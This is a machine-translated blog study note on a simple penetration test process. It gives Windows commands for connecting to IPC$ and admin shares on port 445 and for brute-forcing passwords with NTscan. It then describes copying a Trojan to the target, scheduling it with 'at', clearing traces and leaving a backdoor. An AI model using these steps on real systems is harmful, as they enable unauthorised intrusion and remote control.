当前位置:网站首页>Network Security Learning (x) simple test process of penetration
Network Security Learning (x) simple test process of penetration
2022-07-21 11:13:00 【Shake light·】
Simple penetration test process
1. information gathering
nslookup whois
2. Scan for leaks
namp=ip Range port 80(IIS,apache, What website )
Advanced scanning : Such as IIS Loophole 2003-IIS6.0 2008IIS7.0
Scanning for website vulnerabilities ()
3. Exploit
4. Raise the right (shell, Desktop Environment , Desktop Environment )
5. Clean up traces
6. leave oneself a way out
7. Penetration test report
Probe
Generally, you can also use commands by using software
telnet ip Address Port number Detection port
445 Exploit And IPC$
Use command
net use see
net use f: \\10.1.1.2\share password /user: user
net use f: /del
net use * /del
net use f: \\10.1.1.2\c$ password /user: user
net use \\10.1.1.2\ipc$ password /user: user // Generally, only the password is unknown , So it is recommended to put your own computer The administrator name of has changed
Brutally crack the system password 445
Use software NTpass, It will frequently enter the above command , Brute force code , Use default configuration
Add user dictionary and password dictionary ,ntpass For the password dictionary ,ntuser For user dictionary
You can also use the dictionary generation tool to add dictionaries
Wait for the password to be cracked —— complete
ipc$ The role of : Can control all shared folders of the other party and execute programs on the other party's computer
Make a Trojan
copy Implant Trojans
net time \\10.1.1.2
at \\10.1.1.2 Time " route "
Waiting for execution
The steps are
1.scanport Scan port 445
2.NTscan Crack the code
3. command net use \\10.1.1.2\ipc$ password /user: user
4. Use grey pigeons to make and implant Trojans
边栏推荐
- Xilinx Mipi csi-2 receiver subsystem IP details
- CentOS 7 deploys memcached cache server
- bug汇总
- How is agile Bi different from traditional Bi?
- Error when wmware enables virtualization function
- VC all rested? In the first half of the year, Hillhouse venture capital made nearly 80 shots, 60% before the a-round
- influxdb查询时间戳问题
- Install MySQL through docker in centos7
- BGP相关知识点
- 李宏毅老师2020年深度学习系列讲座笔记3
猜你喜欢
[Extension announcement] 2022 International Conference on touch and virtual reality (ichvr 2022)
堆排序总结
Mdclub lightweight web forum source code
(‘You must install pydot (`pip install pydot`) and install graphviz...)
会员数继续下滑,Netflix能靠广告突围吗?
单张RGB图估计3D手部姿态与形态
Some easily confused pointers [summary direction]
Musk: I uploaded my brain to the cloud. Sorry, 404
半导体新晋独角兽,TCL刚刚投了18亿
网络安全学习(八)域
随机推荐
【延期公告】2022年触觉与虚拟现实国际会议(ICHVR 2022)
有了 screen 和 nohup 跑深度学习代码再也不用愁了 | 退出终端不会影响服务器程序代码运行
网络安全学习(九)综合实验&PKI
Wpf 多指应用开发解析
JS-----第三章 js循环
OptaPlanner 发展方向与问题
AI helps double carbon goal: let every kilowatt hour be optimized by us
TNN笔记
网络安全学习(三)基本DOS命令
Programmers are new to the workplace, how to plan their career?
Tmech publishes the latest progress in the operation control technology of the must choose: to realize the high robustness walking of humanoid robots
21_ life cycle
Compile, install and configure PHP under Debian 9
%s、%1$s、%d、%1$d占位符
Detailed explanation of class, classloder, Dex
张小泉,冤吗?
CentOS 7 deploys memcached cache server
yolov5
2021/7/24 SVM 2021/7/26 后门学习&对抗神经网络
李宏毅老师2020年深度学习系列讲座笔记6